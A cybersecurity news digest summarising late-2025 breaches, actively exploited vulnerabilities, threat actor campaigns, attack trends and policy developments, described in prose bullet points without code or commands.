Major Incidents or Breaches

  • Eurofiber France disclosed a data breach after hackers exploited a vulnerability in its ticket management system, resulting in exfiltration of customer information. The breach was discovered after the attacker attempted to sell the data.
  • Princeton University reported a data breach on 10 November 2025, exposing personal information of alumni, donors, faculty, and students.
  • DoorDash confirmed a data breach involving compromise of names, addresses, email addresses, and phone numbers after an employee was targeted in a social engineering attack.
  • The Pennsylvania Attorney General’s office confirmed a data breach following an August 2025 ransomware attack by the INC Ransom group, with personal and medical information stolen.
  • Logitech confirmed a data breach after being listed by the Cl0p ransomware group. The incident is linked to the Oracle E-Business Suite exploitation.
  • Dutch police seized approximately 250 servers used by a bulletproof hosting service that provided infrastructure for cybercriminals.

Newly Discovered Vulnerabilities

  • Google released security updates for Chrome to address two vulnerabilities, including CVE-2025-xxxx, a V8 zero-day flaw under active exploitation, reportedly by a commercial spyware vendor.
  • A critical remote code execution vulnerability in Fortinet FortiWeb WAF is being actively exploited in the wild, allowing unauthenticated attackers to execute administrative commands.
  • The RondoDox botnet is exploiting CVE-2025-24893, a critical RCE vulnerability in XWiki Platform. Widespread exploitation has been observed, including by botnets, crypto miners, and custom tools.
  • Seven malicious npm packages are abusing the Adspect cloud-based service to redirect researchers while leading victims to malicious payloads.
  • A vulnerability in DoorDash’s email systems allowed attackers to send spoofed, official-looking emails from DoorDash servers, creating a significant phishing risk. DoorDash has since patched the issue.
  • Researchers identified a security weakness in the AI-powered coding tool Cursor, enabling credential-stealing attacks via a malicious MCP server hijacking the internal browser.

Notable Threat Actor Activity

  • The Dragon Breath threat actor is using a multi-stage loader (RONINGLOADER) to disable security tools and deploy a modified Gh0st RAT in recent campaigns.
  • Iranian state-sponsored APTs are targeting defense and government officials, including their family members, in ongoing campaigns to increase pressure on primary targets.
  • The Aisuru botnet launched a 15.72 Tbps DDoS attack against Microsoft Azure, leveraging over 500,000 IP addresses.
  • The EVALUSION ClickFix campaign is deploying Amatera Stealer and NetSupport RAT via social engineering techniques.
  • Cl0p ransomware group continues to exploit Oracle E-Business Suite (CVE-2025-61882), with associated data breaches including Logitech.
  • Scammers are sending fake copyright violation messages to steal X (formerly Twitter) logins.

Trends, Tools, or Tactics of Interest

  • Phishing attacks are increasingly shifting to non-email channels, with LinkedIn and other platforms now accounting for 1 in 3 phishing incidents.
  • ClickFix social engineering tactics are being widely adopted in malware distribution campaigns.
  • Malicious packages in open-source repositories such as npm are using cloud-based redirectors to evade detection and target victims.
  • Bulletproof hosting services remain a critical enabler for cybercriminal infrastructure, as evidenced by recent law enforcement action in the Netherlands.
  • Attackers are leveraging vulnerabilities in widely used platforms (e.g., XWiki, FortiWeb, Oracle E-Business Suite) for large-scale exploitation.
  • DDoS attacks are increasing in scale and sophistication, as demonstrated by the recent record-setting attack on Microsoft Azure.

Regulatory or Policy Developments Affecting the Security Industry

  • In the US, five individuals pleaded guilty to assisting North Korean IT workers in obtaining employment at US companies by providing false identities and remote access to company laptops, highlighting ongoing law enforcement efforts against supply chain and insider threats.
  • Microsoft released an out-of-band Windows 10 update (KB5072653) to address issues with installing Extended Security Updates, ensuring continued compliance for organizations relying on legacy systems.